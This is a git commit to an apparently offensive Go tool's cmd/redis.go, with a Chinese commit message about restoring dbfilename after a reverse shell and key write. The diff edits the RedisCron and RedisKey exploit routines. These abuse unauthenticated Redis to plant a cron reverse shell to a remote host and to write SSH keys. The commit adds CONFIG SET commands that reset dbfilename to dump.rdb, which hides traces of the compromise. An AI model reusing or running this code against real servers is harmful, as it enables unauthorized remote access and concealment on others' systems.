增加redis在执行完成反弹shell和key写入后，回复dbfilename为dump.rdb

2026-02-10 13:55:12 +08:00 · 2022-01-10 11:45:01 +08:00
parent fcacf6d541
commit c793ff4145
1 changed files with 27 additions and 2 deletions
--- a/cmd/redis.go
+++ b/cmd/redis.go
@@ -290,8 +290,8 @@ func RedisExec(conn net.Conn, cmd string) {
 }

 func RedisCron(conn net.Conn, RemoteHost string) (bool, error) {
-	c, s, e := RedisWrite(conn)
-	Println(fmt.Sprintf("%v %v %v", c, s, e))
+	c, s, _ := RedisWrite(conn)
+	Println(fmt.Sprintf("[+] Redis cron %v ssh %v", c, s))
 	// 先解析RemoteHost参数
 	var (
 		remote = strings.Split(RemoteHost, ":")
@@ -344,9 +344,22 @@ func RedisCron(conn net.Conn, RemoteHost string) (bool, error) {
 					return false, err
 				}
 				if strings.Contains(reply, "OK") {
+					Println("[+] save corn success")
 					flag = true
 				}
 			}
+			// 恢复原始的dbfilename
+			_, err = conn.Write([]byte(fmt.Sprintf("CONFIG SET dbfilename dump.rdb\r\n")))
+			if err != nil {
+				return false, err
+			}
+			reply, err = RedisReply(conn)
+			if err != nil {
+				return false, err
+			}
+			if strings.Contains(reply, "OK") {
+				Println("[+] Restore the original dbfilename")
+			}
 		}
 	}
 	return flag, nil
@@ -403,6 +416,18 @@ func RedisKey(conn net.Conn, filename string) (bool, error) {
 					flag = true
 				}
 			}
+			// 恢复原始的dbfilename
+			_, err = conn.Write([]byte(fmt.Sprintf("CONFIG SET dbfilename dump.rdb\r\n")))
+			if err != nil {
+				return false, err
+			}
+			reply, err = RedisReply(conn)
+			if err != nil {
+				return false, err
+			}
+			if strings.Contains(reply, "OK") {
+				Println("[+] Restore the original dbfilename")
+			}
 		}
 	}
 	return flag, nil